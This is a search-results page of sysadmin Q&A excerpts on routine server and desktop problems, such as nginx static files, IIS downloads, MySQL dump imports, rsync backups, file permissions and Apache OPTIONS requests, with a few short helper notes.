Search Results

Search found 58272 results on 2331 pages for 'apache log files'.


  • nginx not serving admin static files?

    - by toto_tico
    First, I want to clarify that this error affects just the admin static files — that is, only the static files belonging to the Django admin. The rest of the static files work perfectly. Basically, for some reason I cannot access the admin static files through the nginx server. Everything works with Django's development (micro) server, and collectstatic is doing its job: it puts the files in the expected place in the static folder. The URLs are correct, but I cannot access the admin static files even directly, while the others I can. For example, I am able to access this URL (copying it into the browser):

        myserver.com:8080/static/css/base/base.css

    but I am not able to access this one:

        myserver.com:8080/static/admin/css/admin.css

    I also tried copying the admin/ directory structure into other_admin_directory_name/. Then I can access:

        myserver.com:8080/static/other_admin_directory_name/css/admin.css

    So that works. I checked permissions and everything is fine. I tried changing ADMIN_MEDIA_PREFIX = '/static/admin/' to ADMIN_MEDIA_PREFIX = '/static/other_admin_directory_name/'; it doesn't work. This is a mystery in itself that I am still exploring, with no luck so far. Finally, and this seems to be an important clue: I tried copying the admin/ directory structure into admin_and_then_any_suffix/. Then I cannot access:

        myserver.com:8080/static/admin_and_then_any_suffix//css/admin.css

    So if the name of the directory starts with admin (for example administration or admin2), it doesn't work.

    * Added thanks to sarnold's observation: the problem seems to be in the nginx configuration file /etc/nginx/sites-available/mysite:

        location /static/admin {
            alias /home/vl3/.virtualenvs/vl3/lib/python2.7/site-packages/django/contrib/admin/media/;
        }
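    One thing worth noting about that config: nginx prefix locations match any URI that merely begins with the prefix, so a location /static/admin block also captures /static/administration and /static/admin2 — which would explain the "starts with admin" clue above. A hedged variant with explicit trailing slashes (the paths are the question's own; whether the alias target actually contains the admin CSS is an assumption to verify):

        # prefix locations match /static/admin2, /static/administration, etc. too;
        # trailing slashes narrow the match and keep the alias mapping consistent
        location /static/admin/ {
            alias /home/vl3/.virtualenvs/vl3/lib/python2.7/site-packages/django/contrib/admin/media/;
        }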

    Read the article

  • System32 files can be deleted in Windows 2008 but not in Windows 2003 [closed]

    - by Harvey Kwok
    I have been using Windows 2003 for a long time. It has a wonderful feature; I don't know its name, but it works like this: you can rename or delete some important files inside C:\windows\system32, e.g. kerberos.dll, and after a while the deleted files are automatically recovered. I think this is because those files are critical enough that Windows cannot survive without them. In Windows 2008, however, this feature is gone. Instead, all the files in System32 are owned by TrustedInstaller — but as an administrator, I can still take ownership of the files and then delete them. Windows 2008 won't recover the deleted files, and hence the system is screwed the next time it's rebooted. So I wonder why Windows 2008 dropped that wonderful feature. Did the auto-recovery feature suffer from some issues of its own? Does Windows 2008 have some other feature that can prevent this type of disaster from happening?

    Read the article

  • Shared files folder in Amazon Elastic Beanstalk environment

    - by por
    I'm working on a Drupal application which is planned to be hosted in an Amazon Elastic Beanstalk environment. Basically, Elastic Beanstalk enables the application to scale automatically by starting additional web server instances based on predefined rules. The shared database runs on an Amazon RDS instance, which all instances can access properly. The problem is the shared files folder (sites/default/files).

    We're using git as SCM, and with it we're able to deploy new versions by executing $ git aws.push. In the background, Elastic Beanstalk automatically deletes ($ rm -rf) the current codebase from all servers running in the environment and deploys the new version. The plan was to use S3 (s3fs) for shared files in the staging environment, and NFS in the production environment. We've managed to set up the environment to the extent that the shared files folder is properly mounted after a reboot. But... the problem is that, in this setup, deploying new versions to running instances fails because $ rm -rf can't remove the mounted directory; as a result, the entire environment goes down and we need to restart it, which isn't really an elegant solution.

    Question #1: what would be the proper way to manage shared files in this kind of deployment? Are you running such an environment? How did you solve the problem?

    Looking at the Elastic Beanstalk Hostmanager code (Ruby), there seems to be a way to hook our functionality (unmount if mounted in pre-deploy, and mount in post-deploy) into Hostmanager (/opt/hostmanager/srv/lib/elasticbeanstalk/hostmanager/applications/phpapplication.rb), but the scripts defined in that file (i.e. /tmp/php_post_deploy_app.sh) don't seem to be working. That might be because our Ruby skills are non-existent.

    Question #2: did you manage to hook your functionality into Hostmanager in a portable way (i.e. without changing the core Hostmanager files)?
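    For what it's worth, the pre-deploy side of that hook could be as small as the sketch below; the mount point path is an assumption, as is the existence of an /etc/fstab entry for the share, and this hasn't been tested against Hostmanager:

        #!/bin/sh
        # pre-deploy sketch: unmount the shared files folder so the deploy's
        # rm -rf can remove the old codebase (MOUNT_POINT is a hypothetical path)
        MOUNT_POINT=/var/app/current/sites/default/files
        mountpoint -q "$MOUNT_POINT" && umount "$MOUNT_POINT"

    A matching post-deploy script would run mount "$MOUNT_POINT" again once the new codebase is in place.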

    Read the article

  • Excel fails to open Python-generated CSV files

    - by johnjdc
    I have many Python scripts that output CSV files. It is occasionally convenient to open these files in Excel. After installing OS X Mavericks, Excel no longer opens them properly: it doesn't parse the files, and it duplicates the rows of the file until it runs out of memory. Specifically, when Excel attempts to open the file, a prompt appears that reads: "File not loaded completely."

    An example of the code I'm using to generate the CSV files:

        import csv
        with open('csv_test.csv', 'wb') as f:
            writer = csv.writer(f)
            writer.writerow([1, 2, 3])
            writer.writerow([4, 5, 6])

    Even the simple file generated by the above code fails to load properly in Excel. However, if I open the CSV file in a text editor, copy/paste the text into Excel, parse it with text-to-columns, and then save as CSV from Excel, I can reopen the CSV file in Excel without issue. Do I need to pass an additional parameter in my scripts to make Excel parse the CSV files the way it used to? Or is there some setting I can change in OS X Mavericks or Excel? Thanks.

    Read the article

  • IIS6 sending a 404 for ".exe" files

    - by Tracker1
    Recently a bunch of files I had set up for download via IIS6's web server stopped working. They are a number of setup files ending in ".exe" and were working until a few months ago. I have the file permissions set properly, and I even enabled directory browsing in IIS to confirm that the paths are correct. I'm not sure if it is related, but directories containing a period stopped working as well, e.g.:

        ~/download/ApplicationName/0.9/AppName-setup-0.9.123b2.exe

    When I rename the directory to, say, 0_9, browsing works, but the file itself still gets a 404 from IIS. For now, I've set up FileZilla FTP for anonymous access to these files, but I would prefer to keep using IIS. I've considered creating an HTTP handler to serve the .exe files, but would really prefer a configuration solution. I just can't figure out why it isn't working, as all the settings are correct: the directory is set up for read access, "Everyone" has read permissions on the files themselves, and directory browsing (aside from the "0.9" to "0_9" rename) shows the files.

    Read the article

  • Copy files from subdirectories into one directory

    - by Derek Organ
    OK, I have a bunch of files in this file structure:

        /backup/daily/database1/database1-2011-01-01.sql
        /backup/daily/database1/database1-2011-01-02.sql
        /backup/daily/database1/database1-2011-01-03.sql
        /backup/daily/database1/database1-2011-01-04.sql
        /backup/daily/database1/database1-2011-01-05.sql
        /backup/daily/database1/database1-2011-01-06.sql
        /backup/daily/database1/database1-2011-01-07.sql
        /backup/daily/anotherdb/anotherdb-2011-01-01.sql
        /backup/daily/anotherdb/anotherdb-2011-01-02.sql
        /backup/daily/anotherdb/anotherdb-2011-01-03.sql
        /backup/daily/anotherdb/anotherdb-2011-01-04.sql
        /backup/daily/anotherdb/anotherdb-2011-01-05.sql
        /backup/daily/anotherdb/anotherdb-2011-01-06.sql
        /backup/daily/anotherdb/anotherdb-2011-01-07.sql
        /backup/daily/stuff/stuff-2011-01-01.sql
        /backup/daily/stuff/stuff-2011-01-02.sql
        /backup/daily/stuff/stuff-2011-01-03.sql
        /backup/daily/stuff/stuff-2011-01-04.sql
        /backup/daily/stuff/stuff-2011-01-05.sql
        /backup/daily/stuff/stuff-2011-01-06.sql
        /backup/daily/stuff/stuff-2011-01-07.sql

    And there are lots, lots more. Ultimately I want to import all the 2011-01-07.sql files into my MySQL database. This works for one:

        mysql -u root -ppassword < /backup/daily/database1/database1-2011-01-07.sql

    That nicely restores one database from its backup file. I want to run a process that does this for all databases. So my plan is to first cp all the 2011-01-07 SQL files into a tmp dir, e.g.:

        cp /backup/daily/*/*2011-01-07*.sql /tmp/all

    Unfortunately the command above isn't working; I get an error:

        cp: cannot stat ..... No such file or directory

    So can you guys help me out with this? For bonus points, if you can tell me how to do the next step — importing all the databases, one at a time, with one command — that would be great too. I really want to do this as two separate steps, because I need to delete a few SQL files manually from the tmp dir before I run the restore command. So I need: 1) a command to copy all 2011-01-07 SQL files to a tmp dir, and 2) a command to import all the files in that dir into MySQL. I know it's possible to do it in one, but for lots of reasons I'd really prefer two steps.
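    In case it helps to see the shape of it, the two steps could look roughly like the sketch below. The paths and MySQL credentials are the question's own; the find pattern and the mkdir are my assumptions:

        # step 1: stage every 2011-01-07 dump into /tmp/all
        mkdir -p /tmp/all
        find /backup/daily -type f -name '*2011-01-07*.sql' -exec cp {} /tmp/all/ \;

        # step 2: after manually pruning /tmp/all, import the files one at a time
        for f in /tmp/all/*.sql; do
            mysql -u root -ppassword < "$f"
        done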

    Read the article

  • Filesystem fragmentation on the level of set of files

    - by trismarck
    A file is stored in blocks by the file system; a block is the smallest amount of data the file system can assign to store a file. The classical definition of a fragmented file is one stored in blocks that are 'scattered' (physically non-contiguous) around the hard drive. What I want to ask about is a second type of fragmentation I've come up with. Let's suppose we install a program with very many files. When the program starts, it always loads the contents of those files sequentially. Now, even if the hard disk is defragmented, there is still a possibility that the files (though not the blocks making up each file) are scattered around the disk, and thus the program's launch time will be longer. In fact, launch time could be longer after defragmenting the disk, as the defragmentation process not only glues fragmented files together but also moves some files around to optimize the free space chunks.

    The questions: is the type of fragmentation I mentioned relevant for the file system? Is it possible to remedy this kind of fragmentation, and if yes, how would you do it? Also, I'm not sure if this question belongs on Super User or on Server Fault (I'd guess file-system fragmentation matters more in a server environment).

    Read the article

  • How can I batch convert SVG files containing text to PDF files (specifically on CentOS 5.3 x86_64)?

    - by molecules
    I would like to programmatically convert SVG files to PDF files. However, the SVG files contain text that must remain searchable in the generated PDFs. It also has to work on Red Hat Enterprise Linux 5.3 or CentOS 5.3 for the x86_64 architecture. It would be nice if it were open source, or at least not very expensive. Here is what I've tried; all of these, except Batik, work fine on Debian Lenny.

    Inkscape: I can get it installed using autopackages from http://inkscape.modevia.com/ap, but when I use it from the command line, the text is not searchable.

    Batik rasterizer [sic]: when it converts SVG files to PDF files, the text is no longer searchable.

    svg2pdf: the source for this and several of its dependencies is available to download. I have been trying to get it to compile on CentOS, but haven't had success yet. I found a precompiled version for Debian x86_64, but it doesn't work on CentOS.

    rsvg-convert: the generated PDF isn't searchable on CentOS 5.3; perhaps installing a newer version of cairo would help. Thanks to DaveParillo for mentioning rsvg-convert (on Super User).

    SOLUTION (but perhaps some of the above will still be useful to the reader): PrinceXML. It works fine on CentOS when installed from source; for some reason it doesn't work when installed from the .rpm. Thanks Erik Dahlström! (provided the solution that worked for my case on Stack Overflow)

    Cross-posted on Stack Overflow.
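    As for the "batch" part, once any single-file converter produces searchable text, the wrapper is just a loop. A sketch using rsvg-convert's one-file-in, one-file-out interface (substitute whichever tool ends up working):

        # convert every SVG in the current directory to a same-named PDF
        for f in *.svg; do
            rsvg-convert -f pdf -o "${f%.svg}.pdf" "$f"
        done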

    Read the article

  • How to move or delete files from a folder containing 2 million files on an NTFS drive?

    - by Beau
    The issue is that any modification to the directory locks up Explorer indefinitely, though Samba access to other directories still works. I've tried moving files locally and over Samba. Even enumerating the directory to get the list of files locks up the computer indefinitely; I tried using Python's win32file.FindFilesIterator to iterate over the files, but that also hangs. My idea was to move each file into a different directory (in a directory above the one we're dealing with) based on its timestamp, so that we'd have at most a thousand or so files in each directory. But since I can't even enumerate the files, that's been a non-starter. If I have to give up and just nuke the directory, I'm willing to do that, but a standard delete also hangs indefinitely.

    I have set these two parameters to increase speed, and they didn't help either:

        R:\>fsutil behavior query disablelastaccess
        disablelastaccess = 1
        R:\>fsutil behavior query disable8dot3
        disable8dot3 = 1

    These are all sequential images, which would have run into the 'bug' with 8.3 filenames whereby many similarly named files in one directory can take a long time to compute 8.3 names. From what I understand, this data is stored in the file system even after disable8dot3 is enabled, so it may still be contributing to the problem. Any ideas?
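    One trick often suggested for directories too large for Explorer is to let robocopy mirror an empty folder over the full one, which deletes the contents without an up-front enumeration pass. A cmd sketch — the directory names are placeholders, and this is untested at the 2-million-file scale:

        :: mirror an empty directory onto the huge one, then remove both shells
        mkdir C:\empty
        robocopy C:\empty R:\huge_directory /MIR /R:0 /W:0
        rmdir R:\huge_directory
        rmdir C:\empty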

    Read the article

  • Windows 8 Pro Homegroup Not Allowing Access to Shared Files

    - by Jack Herr
    I have two PCs and a laptop. With all three running Windows 7, HomeGroup worked perfectly, with all computers able to access the files on the others exactly as one would expect. I then installed Windows 8 Pro, downloaded recently from the MSDN website, on the laptop. From the info on the MSDN website, I believe the downloaded version is the official release, not a release candidate. The install preserved all settings, apps, and files.

    I cannot connect to the homegroup from the laptop. Well, not exactly: I joined the homegroup during the install, and later left and rejoined the one advertised as being offered by one of the PCs (not sure why that one was picked and not the other, or both). This homegroup appears in my "Computer" folder in File Explorer, offering files from that PC, but it excludes documents (only the music, pictures, videos, and playlists folders appear), and I can actually access those files from the laptop. The Homegroup folder, however, which shows all the computers by account and computer name and does include documents from both computers, does not open those folders when clicked. The computers listed by name in the Network folder give me a login prompt that doesn't work: it asks for a username and password, and no combination works. Further, the following error message appears before the login is even attempted: "The system cannot contact a domain controller to service the authentication request. Please try again later."

    The two Windows 7 PCs continue to share all files, including documents, seamlessly. I can also get to the laptop's shared files, which I shared during setup, from either PC. Any ideas?

    Read the article

  • How to remove NTFS system files from a previous Vista installation

    - by Boldewyn
    I'm trying to shrink my system partition under Windows Vista. It's all fine, except that in front of the last 300 MB of the volume sits a single file that cannot be moved from its position by defrag or other means. It's called C:\$Extend\$UsnJrnl:$J, and my assumption is that it is left over from a previous installation of Vista, from when I set the system up again. Now, googling for this kind of file brings interesting results, but no solution to my problem:

    Files left on the disk can become ownerless in a new Windows setup and inaccessible (even to administrators). To access them again, I found the tip to use takeown to reassign them to the Admin group (or anyone else). This works like a charm for normal files, but not for the C:\$Extend stuff.

    The C:\$Extend folder is a system folder of the NTFS file system, where the journal is stored (specifically in a file called $UsnJrnl:$Data, whose name is surprisingly close to mine). You can delete the journal with fsutil usn deletejournal /d C:, but this doesn't work from within the booted system (as I found out by trying), and I'm not quite sure of the side effects.

    You can't move NTFS's own files with standard defrag tools; the same holds, by the way, for inaccessible files. Every bit of knowledge out there targets either inaccessible files or the $Extend NTFS stuff, but no one addresses my problem, which involves both: an inaccessible system file.

    Question: how can I remove this file, or at least move it on the disk?

    Read the article

  • Apache permission problems

    - by swg1cor14
    OK: all my files and folders have owner vsftpd:nogroup. The FTP program can upload, create, and do everything. But when I use the PHP command mkdir, I get Permission Denied, even though the folder it's creating in is set to chmod 777. If I set the base folder to user www-data and group www-data, PHP's mkdir will work; however, I then can't use FTP to delete from or upload to that folder.

    /uploads is the base folder. I use PHP's mkdir to create a directory in there:

        if (!is_dir($_SERVER['DOCUMENT_ROOT'] . "/uploads/" . $_REQUEST['clientID'] . '/video/')) {
            @mkdir($_SERVER['DOCUMENT_ROOT'] . "/uploads/" . $_REQUEST['clientID'] . '/video/', 0777);
        }

    If /uploads is vsftpd:nogroup, PHP's mkdir gives a Permission Denied error. If /uploads is www-data:www-data, PHP's mkdir works, but I can't FTP anything into the folder that was just created. If /uploads is vsftpd:www-data, PHP's mkdir gives a Permission Denied error. How can I create a directory with PHP and still be able to access it via FTP?
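    A common pattern for this kind of two-daemon write access is a shared group plus the setgid bit, so directories created by either user stay group-writable. A sketch — the group name is hypothetical, and it assumes the FTP user really is named vsftpd as in the question:

        # put both users in one group and make /uploads inherit it
        groupadd webshare
        usermod -aG webshare www-data
        usermod -aG webshare vsftpd
        chgrp -R webshare /path/to/uploads
        chmod -R g+rwX /path/to/uploads
        chmod g+s /path/to/uploads   # new subdirectories inherit the group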

    Read the article

  • Backup files from Linux client to Windows Server

    - by Andrew
    I'm trying to back up files from my Linux box to my Windows Server 2008 machine as a push, such that when I delete them from the Linux box, they remain on the Windows Server. I've found lots of similar sources, but most cover Windows to Linux. I managed to find slightly closer cases, like using rsync and Cygwin to sync files from a Linux server to a Windows notebook PC, and rsync from a Windows PC to a remote Linux server; the most similar was a backup from Linux to Windows Server, but done as a pull from the Windows side.

    Initially I used Unison, because I thought its two-way capability would come in handy and I would just have to set some configuration to make it one-way. Unfortunately, I couldn't find the right configuration, and only managed to synchronize using the command unison "profile" -ui text -auto -silent. When I deleted the files on my Linux box, the files on the server got deleted too, which of course isn't what I want. Looking through Unison's options, I only discovered -force, which didn't help, since what I wanted was an incremental update to the server.

    I found out I could achieve this with rsync and the -a (archive) option, which would keep adding files even after I deleted them from my Linux box. I installed Cygwin on my Windows Server and configured an SSH daemon, but I can't seem to get it working. I've also already configured Windows Firewall to open port 22 (both inbound and outbound). I used the following command from my Linux box:

        rsync -avrzn /folder/to/be/backed/up/ [email protected]:/cygdrive/c/place/to/store/backed/up/files

    (a - archive, v - verbose, r - recurse into subdirectories, z - compress, n - dry run), but it just won't work. Can anyone help me out? I don't mind using either Unison or rsync, as long as it achieves what I want.
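    If it helps to split the failure modes, a minimal check might look like the sketch below: first confirm the Cygwin sshd answers at all, then run rsync without -n (dry run deliberately makes no changes) and without --delete, so local deletions never propagate. Host, user, and paths are placeholders standing in for the question's own:

        # 1. does SSH to the Cygwin sshd work at all?
        ssh user@windows-server echo ok

        # 2. incremental push: no --delete, so files removed locally stay on the server
        rsync -avz /folder/to/be/backed/up/ \
            user@windows-server:/cygdrive/c/place/to/store/backed/up/files/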

    Read the article

  • Methods to transfer files from Windows server to linux server

    - by Raze2dust
    Hi, I need to transfer webserver-log-like files, generated periodically, from Windows production servers in the US to Linux servers here in India. The files are ~4 MB each, and I get about one file per minute. I can accept about 5 minutes of lag between a file being written on Windows and it being available on the Linux machines. I am a bit confused between the various options, as I am quite inexperienced in this kind of design:

    1. Write a C#.NET service that will periodically archive, compress, and send the files over to the Linux machines. These files are quite compressible: WinRAR can turn 32 MB of them into a 1.2 MB archive, so that should solve the network transfer speed issue. But then how exactly do I transfer the files to Linux? I could mount a Linux drive on the Windows server using Samba, or run an FTP server, or send each file serialized as a POST request. Which one would be good? I also have to minimize the load on the Windows server.

    2. Mount the Windows drive on Linux instead, using either the mount command or Samba (what are the pros and cons of these two?), and write the compressing and copying part on the Linux side.

    I don't trust the internet connection to be very stable, so there should be a good retry mechanism and failure protection too. What are the potential gotchas in these situations, and what other points should I be worried about? Thanks, Hari
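    For scale, the Linux side of the second option could be as small as the sketch below; the share name, credentials, and directories are all placeholders, and it assumes mount.cifs is installed:

        # mount the Windows log share read-only over CIFS, then copy incrementally
        mount -t cifs //windows-server/logs /mnt/winlogs -o username=loguser,password=secret,ro
        rsync -av /mnt/winlogs/ /data/incoming-logs/

    A cron job around the rsync line gives a basic retry mechanism, since rsync only transfers whatever is still missing on the destination.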

    Read the article

  • OPTIONS * HTTP/1.0 APACHE

    - by Abby E
    I've been noticing lately that OPTIONS * HTTP/1.0 has been coming up a lot in my /server-status. I'm running Ubuntu 12.04 with the latest Apache/PHP/MySQL. I'm not sure what these requests are for, but I would like to see whether somehow turning them off would affect performance; I host some heavily accessed stuff that uses PHP/MySQL (600 rps). Since I see the local 127.0.0.1 IP, I assume it's something running locally. What is it? How do you turn it off? If turned off, how would it affect performance?

    The list below is a small example of it (the hostname has been redacted as REMOVED):

        211-0 - 0/0/1035 . 24.28 240189 0 0.0 0.00 0.18 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        212-0 - 0/0/51274 . 677.97 202960 0 0.0 0.00 8.99 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        213-0 - 0/0/419 . 11.85 240424 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        214-0 - 0/0/240 . 7.96 240552 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        215-0 - 0/0/309 . 9.29 240492 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        216-0 - 0/0/98510 . 1258.25 177391 0 0.0 0.00 17.29 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        217-0 - 0/0/338 . 10.18 240464 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        218-0 - 0/0/345 . 10.27 240469 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        219-0 - 0/0/118538 . 1507.99 168914 0 0.0 0.00 20.80 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        220-0 - 0/0/98452 . 1259.10 177412 0 0.0 0.00 17.29 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        221-0 - 0/0/384 . 10.84 240453 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        222-0 - 0/0/331 . 10.03 240477 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        223-0 - 0/0/314 . 9.04 240493 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        224-0 - 0/0/75193 . 975.24 188845 0 0.0 0.00 13.18 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        225-0 - 0/0/362 . 10.62 240457 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        226-0 - 0/0/125773 . 1593.26 165647 0 0.0 0.00 22.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        227-0 - 0/0/82541 . 1063.89 185092 0 0.0 0.00 14.48 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        228-0 - 0/0/409 . 11.50 240436 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        229-0 - 0/0/219 . 7.38 240581 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        230-0 - 0/0/357 . 10.48 240458 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        231-0 - 0/0/469 . 12.39 240411 0 0.0 0.00 0.08 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        232-0 - 0/0/394 . 11.32 240445 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        233-0 - 0/0/276 . 9.00 240510 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        234-0 - 0/0/245 . 8.51 240536 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        235-0 - 0/0/215 . 7.45 240555 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        236-0 - 0/0/370 . 11.00 240443 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        237-0 - 0/0/400 . 10.96 240446 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        238-0 - 0/0/266 . 8.51 240531 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        239-0 - 0/0/304 . 9.81 240499 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        240-0 - 0/0/446 . 12.47 240421 0 0.0 0.00 0.08 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        241-0 - 0/0/19741 . 282.90 230130 0 0.0 0.00 3.45 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        242-0 - 0/0/98503 . 1259.43 177404 0 0.0 0.00 17.28 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        243-0 - 0/0/251 . 7.93 240551 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        244-0 - 0/0/273 . 8.42 240534 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        245-0 - 0/0/118485 . 1508.14 168950 0 0.0 0.00 20.79 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        246-0 - 0/0/294 . 9.35 240509 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        247-0 - 0/0/413 . 12.34 240437 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        248-0 - 0/0/258 . 8.55 240529 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0
        249-0 - 0/0/303 . 9.77 240485 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0

    Read the article

  • Program to track recently saved files or downloads?

    - by DiegoDD
    Back in Windows XP times, I used a program named Ava Find that could find any file on the system. It had a really nice feature called "Scout Bot" that automatically found new — that is, recently created — files (more info here: AvaFind). For example, if I saved or downloaded a file in any program but couldn't remember its name or where I put it, I just looked at the Scout Bot list, which showed me the most recent files, and I could open them from there or jump to their paths.

    Since I changed to Windows 7 (passing through Vista), the program no longer works: it simply keeps indexing forever and never finds anything. I don't know whether it's incompatible with Windows 7 itself, or with the fact that my Windows 7 is 64-bit. I already tried to contact the Ava Find creators, but they never answered, and the program seems to be no longer supported (although the site still works).

    Now, is there a similar program that finds recent files — i.e. lists the most recently saved files system-wide (or even limited to certain folders or discs)? It must be confirmed to work with Windows 7 64-bit. I know there are many programs, like Everything, that can find any file, but what I want is to find recent files and their paths without knowing their names or extensions. Everything can also sort results by date, which is almost what I need (simply look for part of the file name or extension and take the most recent result), but if I get too many results it takes a while, and I still need to know the name, or at least the extension, of the file. What I want is simply a "most recently saved files" tool — a replacement for Scout Bot in Ava Find. Do you know any alternative?

    Read the article

  • Scheduled Task unable to create/update any files

    - by East of Nowhere
    I have several tasks in Task Scheduler on Windows Server 2008 SP2 (32-bit), and they all successfully "do their work" — except that none of them can create or update any files on disk. All the tasks point to simple .cmd files that contain the real work, but beyond that there's no pattern: some call robocopy with the /LOG option, some call .exe files I wrote that manipulate XML files, some just do stuff with > redirection. With all of them, if I double-click the .cmd file myself, it works fine and the files are created or updated as expected. If I run it from Task Scheduler (on schedule or just by clicking Run), the task always completes "successfully" but without any of the desired file changes. I don't see any "unable to create file" errors in Event Viewer either.

    The tasks all run as a specific account, and I have logged in as that account and verified that it has the permissions it needs. Further details: the tasks are set to "Run whether user is logged on or not", and configured for "Windows Vista or Windows Server 2008" (there is no other "Configure for" option available).

    Read the article

  • Safe to remove Python2.6 files?

    - by darkfeline
    I'm using Linux Mint 11 (will upgrade soon), and I've noticed that, even though I don't have any python2.6 packages installed with apt, there's a bunch of residual python2.6 files scattered around my drive, including, but not limited to, dist-packages in /usr/lib/python2.6 and various /usr/share stuff. Is there any way to test whether these files are still being used? I'm tempted to sudo rm -rf the lot of them, but I'm scared it'll break stuff. Also, does anyone have any idea where these files could have come from? I believe I had python2.6 installed once upon a time, but I made sure to --purge it, so there shouldn't be any trace left, right?

    EDIT: after using a quick script to check all of the files, it appears most of them belong to important packages, so I won't try weeding out the few that I know are probably useless. Although I am curious why so many packages have python2.6 files when I don't even have it installed. These files are not associated with any package, and I'm not sure whether they are safe to remove:

        /usr/bin/ipython2.6
        /usr/lib/python2.6/dist-packages/distribute-0.6.15.egg-info
        /usr/lib/python2.6/dist-packages/easy_install.py
        /usr/lib/python2.6/dist-packages/IPython
        /usr/lib/python2.6/dist-packages/ipython-0.10.1.egg-info
        /usr/lib/python2.6/dist-packages/setuptools
        /usr/lib/python2.6/dist-packages/setuptools.egg-info
        /usr/lib/python2.6/dist-packages/setuptools.pth
        /usr/lib/python2.6/dist-packages/site.py
        /usr/lib/python2.6/dist-packages/wx.pth
        /usr/local/lib/python2.6
        /usr/local/lib/python2.6/dist-packages
        /usr/local/lib/python2.6/site-packages
        /usr/share/man/man1/ipython2.6.1.gz
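    The "quick script" kind of check can be done with dpkg -S, which reports the package (if any) that owns a path. A sketch over the paths listed above:

        # print every python2.6 leftover that no installed package claims
        for f in /usr/bin/ipython2.6 /usr/lib/python2.6/dist-packages/* /usr/local/lib/python2.6; do
            dpkg -S "$f" > /dev/null 2>&1 || echo "unowned: $f"
        done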

    Read the article

  • Where should I go with hosting my site: VPS, GAE, another option?

    - by Jonathan Hayward
    My website, http://JonathansCorner.com/, began life before 1994 as www.imsa.edu/~jhayward/ and has been through various iterations and improvements to content, HTML, and the like, but remains a literature site that is, from a web administrator's perspective, fairly simple and primitive: a fair amount of static HTML and supporting files, a little bit of CGI and URI rewriting, and .htaccess files providing Expires: headers and the like. An associated site demos various CGI scripts that fall under the category of "and other creations"; the site as a whole exists to share my creative works, and so far a fairly rudimentary use of Apache functionality, supported by Unix tools to, for instance, update the RSS feed and the "starting point" link on the home page, has served that purpose fairly well.

    I looked around here on web hosting and found the note on web host recommendations a good answer to "what are people's favorite web hosts overall", but I wanted to ask the more focused question "what are the best web hosts for these criteria":

    - A VPS, so I will have root, be able to install stuff, edit Apache's config files, etc., running Gentoo or another Linux, BSD, or the like.
    - A system secure enough that the host's vulnerabilities are mostly the ones that come with what I am trying to do; that is, I won't be trying to administer and secure an ancient Linux like some have complained about at 1and1.
    - Good uptime/reliability and competent support staff: if the level 1 help desk is going to tell me to go to "My Computer" on a Linux box, I'd like to be able to get past them.
    - Ideally, hosting somewhere with low latency for U.S. visitors in particular.
    - A stable business: one that will probably be around and is unlikely to vanish without warning.

    With those things specified, I would be interested in knowing the less expensive options. (I expect some of these requirements will knock out the cheapest options, but I'm still interested in price.)

    With all that stated, I'd like to back up a bit and ask whether I am asking the right question. I am concerned that the above is a very good way of asking "how can I keep my site in line with the wave of the past?", and I wonder whether it would be specifically wiser to adapt my site to newer technologies instead of keeping it on older ones. For instance, while I would hardly portray my site as a way to show off the full power of Google App Engine, the main site at least should be a straightforward port if I were to do that. Beyond Google App Engine, my knowledge of cloud solutions is basic. If porting my site to another kind of solution is better and more future-proof, I would be interested in knowing where those solutions lie.

    So I would be interested in wisdom. If the question I asked in detail is still the right one to ask, what would people suggest? Or if I should seriously consider porting my site to a newer basic option, what should I try? Any thoughts would be appreciated.

    Read the article

